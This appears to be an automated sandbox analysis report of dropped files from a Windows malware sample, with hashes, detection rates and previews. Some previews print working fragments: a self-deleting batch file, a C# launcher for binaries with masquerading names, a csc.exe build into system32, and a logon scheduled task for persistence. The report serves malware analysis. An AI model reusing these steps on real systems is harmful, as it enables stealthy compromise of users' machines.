                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Users\user\AppData\Local\Temp\twain_32.exe
                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):150528
                                                              Entropy (8bit):5.769203996328619
                                                              Encrypted:false
                                                              SSDEEP:3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
                                                              MD5:658AC2968AC81EADBE165CFD2A770C34
                                                              SHA1:39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
                                                              SHA-256:4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
                                                              SHA-512:CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 92%
                                                              • Antivirus: Virustotal, Detection: 82%, Browse
                                                              Joe Sandbox View:
                                                              • Filename: launcher.exe.bin.exe, Detection: malicious, Browse
                                                              • Filename: Eulen.exe, Detection: malicious, Browse
                                                              • Filename: zufmUwylvo.exe, Detection: malicious, Browse
                                                              • Filename: zufmUwylvo.exe, Detection: malicious, Browse
                                                              • Filename: test2.exe, Detection: malicious, Browse
                                                              • Filename: PasteHook.exe, Detection: malicious, Browse
                                                              • Filename: hfi47s4wOT.exe, Detection: malicious, Browse
                                                              • Filename: , Detection: malicious, Browse
                                                              • Filename: SecuriteInfo.com.Win32.Evo-gen.6103.10668.exe, Detection: malicious, Browse
                                                              • Filename: H8Q1WRGrzw.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):229
                                                              Entropy (8bit):5.1123225064780575
                                                              Encrypted:false
                                                              SSDEEP:6:hCijTg3Nou1SV+DEiyA7Lk8KOZG1wkn23fPQUk:HTg9uYDEirPfXC
                                                              MD5:C518608778C7AB081BE5515985E2B143
                                                              SHA1:1FD71273936E96CF3720D06DB1A639EEF2D0DDDE
                                                              SHA-256:B2A9A6693CA2F7EB2BB8BBA1B6758CD5A7258679412314EB8D336CE44630D2C9
                                                              SHA-512:11D46A66CCC2000A9C2A956EAFC203D8B4497AFBFF666DFB89B33EE2760407154851504AD86EEDBD8741CE561A65AD4BBB76594B632061A69B192136EB913126
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows Defender\Platform\sihost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bxCB1k3pGG.bat"
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                              Category:dropped
                                                              Size (bytes):382
                                                              Entropy (8bit):4.9014117354247455
                                                              Encrypted:false
                                                              SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2geinsaiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLnd
                                                              MD5:BC069AB0055EEDD620BBFE341F8742CB
                                                              SHA1:94FD54C27CCDDA47B2E846DB13D2E056C8887287
                                                              SHA-256:78DA170142B01931CA8302B8FEDA7503A7E404B3730A93DAACA0423A67B1C1E3
                                                              SHA-512:247685B4E169A2B1D02FEB9C830DB609EB4F5E6DB99390DF2B2A567F309E17AF138A10173FE4D136477B70546BD341705C7D6AA8C02E12ACE8AB0F58685A6143
                                                              Malicious:false
                                                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\appcompat\powershell.exe"); } catch { } }).Start();. }.}.
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):250
                                                              Entropy (8bit):5.0387323117612945
                                                              Encrypted:false
                                                              SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f9x:Hu7L//TRq79cQWfn
                                                              MD5:D7D5ACF420E04A997E637F9E3E9AADBF
                                                              SHA1:E0A9562B2B6DAE56C41F5E020A6E2C29DDAF41BC
                                                              SHA-256:E630CC464D8EBCDBEA6B24A40E47C94960FFD40A08A06F3C833A3B8071A18836
                                                              SHA-512:37C6C6C0BF99ED1B0379382B6B55763F98FAABBD8755D434A0881C189F919E92D280FE51E2DCD37AF9EB35FC990732C73C26C02FBDEF5C9DC2DA3F5F5B5D3124
                                                              Malicious:true
                                                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.0.cs"
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (323), with CRLF, CR line terminators
                                                              Category:modified
                                                              Size (bytes):744
                                                              Entropy (8bit):5.235119212881018
                                                              Encrypted:false
                                                              SSDEEP:12:Jl7I/u7L//TRq79cQWfuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:LI/un/Vq79tWfuKax5DqBVKVrdFAMBJj
                                                              MD5:2A61AA92DA1346EFE173FF12E31D78DE
                                                              SHA1:E8AFE8E8F7236BB7C61CC208BCC8BFA720A23D46
                                                              SHA-256:2760331BDDB6019F62BDDEF38DF423C53AB190B55606C77865B2889DA58E7B00
                                                              SHA-512:63A375FA23A7BB36BCF719857C58AB12CDEB345AB3838A6B43CDF4823519021DBAE34B5369BC8133B8E80D05F61AA3DA8CA286EA46044420EC8A5C061A0EEFE4
                                                              Malicious:false
                                                              Preview:.C:\containerperf> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                              Process:C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exe
                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                              Category:dropped
                                                              Size (bytes):6007384
                                                              Entropy (8bit):7.677631047166036
                                                              Encrypted:false
                                                              SSDEEP:98304:L019jVmxMBIJDBWUQ/HUh6Azh+Xfh/iQzNJQEiDJvybzC6SN:LaHBUQ/46ih+X5DQsbu6s
                                                              MD5:1FF26B7D334CD22E726CAF72A4208B96
                                                              SHA1:D2A1AD17E27C01072AC41D4D20426DD5CA7554AD
                                                              SHA-256:56ECE6BE060502193ED0360A8FF7D0633DC7E88D133B28B8A73DFB755D2134DB
                                                              SHA-512:787B02B048DAD824DD216A0B33872B2012FC8B2C47D831A33C4EB05399DF9A253BD30A8789659A7DA0EEA8535BB78705685AC67AE546D2F10210C7BA552B4F49
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......[..&.............@..............................\......[...`... ...............................................[.4.....[. ....`[.......[.X&....\.0...........................`L[.(.....................[.P............................text...............................`..`.data... SY......TY.................@....rdata...>... [..@....[.............@..@.pdata.......`[......D[.............@..@.xdata..<.....[......X[.............@..@.bss.... %....[..........................idata..4.....[......h[.............@....CRT....`.....[......t[.............@....tls..........[......v[.............@....rsrc... .....[......x[.............@....reloc..0.....\.......[.............@..B........................................................................................................................................................................
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):85504
                                                              Entropy (8bit):5.8769270258874755
                                                              Encrypted:false
                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32256
                                                              Entropy (8bit):5.631194486392901
                                                              Encrypted:false
                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33792
                                                              Entropy (8bit):5.541771649974822
                                                              Encrypted:false
                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):5.41854385721431
                                                              Encrypted:false
                                                              SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                              MD5:BBDE7073BAAC996447F749992D65FFBA
                                                              SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                              SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                              SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 9%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):5.645950918301459
                                                              Encrypted:false
                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23552
                                                              Entropy (8bit):5.519109060441589
                                                              Encrypted:false
                                                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                              Process:C:\containerperf\ServerComponenthostMonitorDll.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):5.932541123129161
                                                              Encrypted:false
                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):4926
                                                              Entropy (8bit):3.243304046996453
                                                              Encrypted:false
                                                              SSDEEP:48:FaqdF79/0+AAHdKoqKFxcxkF3/waqdF7av+AAHdKoqKFxcxkFk1:cEi+AAsoJjykzEK+AAsoJjykk
                                                              MD5:4DD3247F95A69791EDE9F97E33B14709
                                                              SHA1:A5090693EB6F5BF8B3594642DA3DD8A91ABD7A4A
                                                              SHA-256:FB0CB2EA577E1230CA5204FE6780FF7858CF42B886B599151CC0C8D5388A2E1D
                                                              SHA-512:D2BCE87DE34D08DED456FB723973C6FD2548205A13AB718F07BB744216B4C6945356596D5764FBD26841CE7B7D5C2C407B3FABBAE006B70C0FCEB2F3416B88F1
                                                              Malicious:false
                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. O.c.t. .. 0.4. .. 2.0.2.3. .1.2.:.0.3.:.4.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              File Type:MSVC .res
                                                              Category:dropped
                                                              Size (bytes):1224
                                                              Entropy (8bit):4.435108676655666
                                                              Encrypted:false
                                                              SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                              MD5:931E1E72E561761F8A74F57989D1EA0A
                                                              SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                              SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                              SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                              Malicious:false
                                                              Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):4608
                                                              Entropy (8bit):3.9329312984335436
                                                              Encrypted:false
                                                              SSDEEP:48:6ZJXPtKM7Jt8Bs3FJsdcV4MKe27yFSvqBHqOulajfqXSfbNtm:8PRPc+Vx9MyFSvkUcjRzNt
                                                              MD5:0925BDBA2505EEC02A21439F3F00FE7C
                                                              SHA1:81B60CFF2B387224A78224C08002079826EBC035
                                                              SHA-256:84B0182A92A393BDB603117D9F1AC2ADC497BBF5A4E06961AF375248E94B1BF6
                                                              SHA-512:D983D7A23EB2E5387C67DEB7D76AB18B01E43480FA62F1B607F2493E106B7099CB6383153446C7178F1D8F49220D9A5678DEF3360AE78B7DFA4F956674D2E0C3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!.g.............................'... ...@....@.. ....................................@.................................@'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3346
                                                              Entropy (8bit):3.586413372825946
                                                              Encrypted:false
                                                              SSDEEP:96:tkvLHpnRiDEpnBnknNGki3igVA9ll7dhFNt7+:qRh/yNw3Urhp+
                                                              MD5:51DC80F0CEF382216033545071CDE098
                                                              SHA1:153129A083F89257908E964DAA307864FE4CE88F
                                                              SHA-256:F534705D703072BA90C52C846DFB6B1A1DC98CF61AEF3DD4254B5EA0E0D0CC1D
                                                              SHA-512:D640BFEA607A29A27ED26C889EE5817A3F7DABE0A4B5DB1C867C59D97173F95C323DDA4ADD613E7A9E3DC9DD7021090F66035B66DEFC86953EBCC3DCACEF8B2C
                                                              Malicious:false
                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.3.4.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.J.O.N.E.S.-.P.C.\.j.o.n.e.s.<./.A.u.t.h.o.r.>..... . . . .<.U.R.I.>.\.S.e.r.v.e.r.C.o.m.p.o.n.e.n.t.h.o.s.t.M.o.n.i.t.o.r.D.l.l.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.5.-.0.1.-.1.3.T.0.7.:.4.0.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . .
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):3604
                                                              Entropy (8bit):3.568664719439722
                                                              Encrypted:false
                                                              SSDEEP:96:tkvLkZdRiDenBnknNGki3igVA9ll7dhFNt7+:xZdRxyNw3Urhp+
                                                              MD5:19A67E86606007DE3081E8C6A060D0A3
                                                              SHA1:1B106806DFC7DEF4DA997568191E67377D633ED7
                                                              SHA-256:77F92BB6E2E171A920FAC8753C3F229E35BF4B38A7F0279EB6454419E0F168DC
                                                              SHA-512:FF3BED5165AC12A6D7793A2F2FDC7FD9C2265CF8012435D1CFA44F2FC37D27D7719CD1EB8537E8F494BD3CC039FC1E1A941D522C3CBFDC33AA91C031F159A0A5
                                                              Malicious:false
